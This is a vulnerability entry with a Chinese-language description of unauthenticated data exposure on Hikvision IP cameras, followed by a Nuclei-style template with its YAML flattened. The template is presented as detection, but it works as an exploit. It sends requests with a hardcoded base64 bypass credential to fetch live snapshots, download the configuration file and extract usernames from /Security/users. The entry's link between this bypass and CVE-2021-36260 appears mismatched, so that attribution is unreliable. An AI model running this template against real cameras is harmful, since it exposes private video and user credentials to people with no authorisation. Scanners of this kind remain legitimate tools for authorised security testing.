Hikvision IP Camera - Snapshot, Config, and User Info Exposure
漏洞信息
漏洞名称: Hikvision IP Camera - Snapshot, Config, and User Info Exposure
漏洞编号:
CVE: CVE-2021-36260
漏洞类型: 信息泄露
漏洞等级: 高危
漏洞描述: Hikvision IP Camera是一种广泛部署于企业和家庭监控系统中的网络摄像头设备,用于实时视频监控和安全防护。由于其广泛的应用,这些设备的安全性至关重要。该漏洞涉及未经认证即可访问敏感端点,包括实时快照、加密的配置文件以及包含用户凭证的XML文件。这种信息泄露漏洞的根源在于设备对特定端点的访问控制不足,使得攻击者无需认证即可获取敏感信息。基于CVE-2021-36260及相关绕过逻辑的利用链,攻击者可以远程访问这些敏感数据,可能导致用户凭证泄露、隐私侵犯,甚至进一步的安全威胁。由于无需认证即可利用,该漏洞的风险等级被评估为高危,可能对受影响设备的用户造成严重影响。
info: name: Hikvision IP Camera - Snapshot, Config, and User Info Exposure author: AbdulrahmanTamim severity: high description:> Detects unauthenticated exposure of sensitive endpoints on vulnerable Hikvision IP cameras. This includes live snapshot feeds, encrypted configuration files, and full user credential XML. Based on exploit chaining of CVE-2021-36260 and related bypass logic. reference: - https://www.cve.org/CVERecord?id=CVE-2021-36260 - https://nvd.nist.gov/vuln/detail/CVE-2021-36260 tags: hikvision,iot,camera,cve,cve2021,exposure,auth-bypass,config,snapshot,xml
variables: b64auth: YWRtaW46MTEK
requests:
-method: GET path: -"{{BaseURL}}/onvif-http/snapshot?auth={{b64auth}}" headers: User-Agent: Mozilla/5.0 matchers: -type: word part: header words: -"Content-Type: image/jpeg" -type: status status: -200 extractors: -type: regex name: snapshot-endpoint part: request regex: -"/onvif-http/snapshot\\?auth=.*"
-method: GET path: -"{{BaseURL}}/System/configurationFile?auth={{b64auth}}" headers: User-Agent: Mozilla/5.0 matchers: -type: word part: header words: -"Content-Type: application/octet-stream" -type: status status: -200 extractors: -type: regex name: config-download part: request regex: -"/System/configurationFile\\?auth=.*"
-method: GET path: -"{{BaseURL}}/Security/users?auth={{b64auth}}" headers: User-Agent: Mozilla/5.0 matchers: -type: word words: -"<userName>" -"<userLevel>" condition: and -type: status status: -200 extractors: -type: regex name: exposed-usernames regex: -"<userName>(.*?)</userName>"